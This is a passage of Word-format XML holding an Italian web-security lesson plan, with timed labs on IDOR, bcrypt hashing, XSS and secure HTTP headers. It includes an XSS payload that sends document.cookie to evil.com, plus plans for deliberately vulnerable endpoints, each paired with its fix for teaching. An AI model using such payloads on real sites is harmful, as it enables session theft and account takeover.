              <w:t xml:space="preserve">Frontale + lavagna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:30 – 0:50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Lab IDOR</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: estendiamo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bancapiccola-mini</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con una rotta</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/fattura/&lt;id&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">vulnerabile. Tutti la sfruttano cambiando l’ID.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">“Avete appena visto il bonifico di un altro cliente.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:50 – 1:00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Correzione</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: ownership check server-side (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">filter_by(owner_id=current_user.id)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) + status code 403 corretto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:00 – 1:15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PAUSA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1:15 – 1:30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Encoding ≠ Hashing ≠ Encryption</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: dimostrazione live Base64 vs SHA-256 vs bcrypt. Perché Base64 NON è cifratura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + demo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:30 – 1:45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Perché MD5/SHA-256 senza salt non vanno</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: velocità GPU, rainbow table. Salt e perché è obbligatorio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + slide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:45 – 2:00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Lab bcrypt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: convertiamo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bancapiccola-mini</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">da SHA-256 a bcrypt. Mostriamo nel DB la differenza visiva:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">5f4dcc3b...</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(SHA) vs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">$2b$12$...</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(bcrypt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="cross-lang-nella-sezione-hashing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-lang nella sezione hashing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Python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bcrypt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_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bcrypt.hashpw(pwd.encode(), bcrypt.gensalt(rounds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12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ok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bcrypt.checkpw(pwd.encode(), hash_)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Java (Spring Security)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">BCryptPasswordEncoder enc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BCryptPasswordEncoder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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash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enc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encode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pwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ok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enc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matches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input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hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// PHP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$hash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password_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$pwd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PASSWORD_BCRYPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'cost'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$ok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password_verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$input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$hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="materiali-per-il-docente-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Materiali per il docente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide adattate da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">04_slide/M6_slide_appweb.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sezioni IDOR + Crypto)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DB Browser for SQLite aperto per mostrare visivamente i tipi di hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“diagnosi visiva password nel DB”</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="verifica-in-itinere-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica in-itinere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Domanda:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Differenza tra 401 e 403?”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se la classe sbaglia → ripassa con un esempio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica DB Browser: tutti aprono il DB del proprio lab, vedono che le password sono ora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$2b$12$...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="compito-per-l5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compito per L5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sezione 3 della Checklist (Output)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riflessione scritta (mezza pagina):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Nel mio progetto di UF 10, le password sono salvate come? Devo modificare qualcosa?”</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="errori-da-evitare-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errori da evitare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Trattare auth/authz come la stessa cosa: è il bug concettuale #1 dei junior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Saltare l’esempio Base64: serve per smontare l’idea che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“encoding = crittografia”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Non far vedere il DB: l’impatto visivo è enorme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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## L5 — Cross-Site Scripting (XSS) + Header HTTP di sicurezza (2h)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:id="52" w:name="obiettivi-formativi-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi formativi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distingue i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3 tipi di XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Reflected, Stored, DOM-based)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">eseguire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un XSS riflessa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">correggere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con escape automatico (Jinja2/Twig) e CSP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conosce i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6 header HTTP di sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">principali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa configurare cookie sicuri (Secure, HttpOnly, SameSite)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="53" w:name="articolazione-minuto-per-minuto-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolazione minuto per minuto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053"/>
        <w:gridCol w:w="2933"/>
        <w:gridCol w:w="2933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Tempo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attività</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modalità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:00 – 0:10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Come funziona un browser</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(sandbox, JS, DOM). Same-Origin Policy in 3 minuti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:10 – 0:25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I 3 tipi di XSS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Reflected (URL), Stored (DB), DOM-based (JS). Tabella riassuntiva. Quale è più grave?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + slide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:25 – 0:45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Lab Reflected XSS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: aggiungiamo a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bancapiccola-mini</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">un endpoint</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/cerca?q=...</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">che riflette</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">q</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">senza escape. Payload</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Tutti vedono l’alert nel browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:45 – 1:00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Lab Stored XSS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: aggiungiamo commenti su una pagina. Payload</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;fetch('https://evil.com/?c='+document.cookie)&lt;/script&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Spieghiamo come ruberebbe il cookie di sessione (collegamento L4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:00 – 1:15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PAUSA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1:15 – 1:30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Correzione</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Jinja2 escape automatico (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{{ var }}</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">invece di</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">\|safe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">). Mostra che in PHP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">htmlspecialchars()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, in JS React fa già escape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato + slide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:30 – 1:50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Header HTTP di sicurezza</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— tour rapido: HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy. Demo: visitare un sito su securityheaders.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + demo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:50 – 2:00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Cookie sicuri</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Secure + HttpOnly + SameSite=Lax. Aggiunta a Flask config (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SESSION_COOKIE_*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">). Spieghi che HttpOnly avrebbe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">bloccato</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">il furto cookie via XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="54" w:name="demo-securityheaders.com"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
